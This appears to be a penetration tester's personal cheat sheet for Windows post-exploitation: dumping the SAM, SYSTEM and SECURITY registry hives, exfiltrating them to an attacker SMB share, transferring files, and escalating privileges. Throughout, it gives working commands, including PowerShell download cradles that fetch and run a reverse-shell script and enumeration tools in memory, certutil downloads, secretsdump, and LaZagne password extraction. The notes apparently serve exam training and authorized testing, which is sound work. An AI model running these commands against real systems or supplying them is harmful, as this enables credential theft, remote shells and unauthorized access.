File Upload & Lateral Movement

Useful commands:

# Find a file in the C drive. 
# Using PowerShell:
Get-ChildItem -Path C:\\Users\\ -Include local.txt -Recurse

# Using CMD: 
# '/s' lists every occurrence of the specified file name within the specified directory and all subdirectories.
C:\\> dir /s local.txt

# 'where', recursive:
where /r C:\\windows eventvwr.exe

# When 'whoami' is not recognized as an internal or external command:
set PATH=%SystemRoot%\\system32;%SystemRoot%;

<aside> <img src="/icons/light-bulb_purple.svg" alt="/icons/light-bulb_purple.svg" width="40px" /> Use: fsutil file createnew c:\\path\\testfile.txt 0 to create a file, similar to touch in Linux. Then echo output into the file.

</aside>

# Retrieve Windows hashes:
reg.exe save hklm\\sam c:\\temp\\sam_backup
reg.exe save hklm\\system c:\\temp\\system
reg.exe save hklm\\security c:\\temp\\security_backup

# On Kali, variations of the same command: 
sudo impacket-smbserver -smb2support Share .
sudo impacket-smbserver -smb2support Share post
# Sometimes the commands above will error, using Auth might fix it:
sudo impacket-smbserver -username user -password qwe123 -smb2support Share 'post'
# I used to create a separate dir to store the hahses, so: 
mkdir post

# Back to Windows:
net use o: \\\\192.168.xxx.xxx\\Share
net use o: \\\\192.168.xxx.xxx\\Share /u:user qwe123
# Once connection is established:
copy sam_backup o:
copy system o:
copy security_backup o:

# Alt way:
samdump2 system sam_backup -o dump_outut
secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

File Upload Methods

# Starting our Web server: 
python3 -m http.server <LPORT>

# Certutil: 
certutil -urlcache -f "http://<LHOST>:<LPORT>/<file>" <output-file>

# SMB,
# On Kali: 
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .
# On target: 
copy \\\\<myip>\\reverse.exe C:\\tmp\\reverse.exe

# PowerShell:
cmd /c powershell IEX(new-object net.webclient).downloadstring('http://<LHOST>/Invoke-PowerShellTcp.ps1')

powershell.exe IEX(new-object net.webclient).downloadstring('http://<LHOST>/Invoke-PowerShellTcp.ps1')

powershell -c IEX(new-object net.webclient).downloadstring('http://<LHOST>/Invoke-PowerShellTcp.ps1')

# Curl in PowerShell:
curl http://<LHOST>/<file> -o <file>

Enumeration Tools

• General PrivEsc enumeration scripts. To gain some efficiency, I moved all the scripts for Windows OS into one directory and made them remotely accessible through SMB and web:

  # Host files in the current directory via SMB:
  impacket-smbserver share .
  
  # Host files in the current directory via HTTP:
  python3 -m http.server 1234
  

  <aside> <img src="/icons/light-bulb_purple.svg" alt="/icons/light-bulb_purple.svg" width="40px" /> Tip: quickly set up the SMB and web servers, by making aliases for the commands above, f.e.webup and smbup.

  </aside>

  Below, I listed different PrivEsc tools and files that I would generally have hosted through the SMB and HTTP server for quick access:

  accesschk64.exe
  accesschk.exe
  accesschk-XP.exe
  Invoke-PowerShellTcp.ps1
  jaws-enum.ps1
  lazagne.exe
  Powerless.bat
  PowerUp.ps1
  Seatbelt.exe
  SharpUp.exe
  Sherlock.ps1
  tmp/ # folder for random files that you want to transfer
  winbin/ #a copy of windows binaries found in /usr/share/windows-binaries/:
      nc64.exe
      nc.exe
      plink.exe
      vncviewer.exe
      wget.exe
      whoami.exe
      ...
  windows-exploit-suggester.py
  winPEASany.exe
  winPEASx64.exe
  winPEASx86.exe
  

  I used the following commands to execute these files in memory, without needing to download them at all:

  # WinPEAS:
  //192.168.xxx.xxx/share/winPEASx64.exe searchall cmd
  //192.168.xxx.xxx/share/winPEASx86.exe searchall cmd
  
  # PowerUp:
  powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('<http://192.168.xxx.xxx/PowerUp.ps1>'); Invoke-AllChecks"
  
  # Sherlock:
  powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('<http://192.168.xxx.xxx/Sherlock.ps1>'); Find-AllVulns"
  
  # JAWS:
  powershell.exe -ExecutionPolicy Bypass -File //192.168.xxx.xxx/share/jaws-enum.ps1
  powershell iex(new-object system.net.webclient).downloadstring('<http://192.168.xxx.xxx/jaws-enum.ps1>')
  
  # Seatbelt - search for non-standard services:
  //192.168.xxx.xxx/share/Seatbelt.exe NonstandardServices
  
  # Lazagna - search for passwords:
  //192.168.xxx.xxx/share/lazagne.exe all
  

Manual Checks

<aside> <img src="/icons/light-bulb_purple.svg" alt="/icons/light-bulb_purple.svg" width="40px" /> My approach: if I need to find a PrivEsc vector quickly, I start with the basic checks outlined below first, and only once it’s done and nothing interesting showed up, then I proceed to use the enumeration scripts. Saves a lot of time.

</aside>

The general flow I used for Windows Privilege Escalation is:

OS -> User -> Permissions -> Network Interfaces -> scheduled tasks -> Patch Info → Enumeration Scripts

Begin with basics:

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
hostname
echo %username%
whoami /priv | /groups | /all
whoami && net user
whoami && (set | findstr /i "PROCESSOR_ARCHITECTURE") && whoami /priv

Now that we have this basic information, we list other user accounts available on the system and view our own user information in finer detail:

C:\\Windows> net users
C:\\Windows> net user Ourusernamehere

# View Domain Groups:
net group /domain

# View Members of Domain Group:
net group /domain <Group Name>

We got to know about users and permissions. Next, we need to know about networking, what is this machine connected to and what rules it might impose on those connections:

C:\\Windows> ipconfig /all  | more
C:\\WINDOWS\\System32\\drivers\\etc\\hosts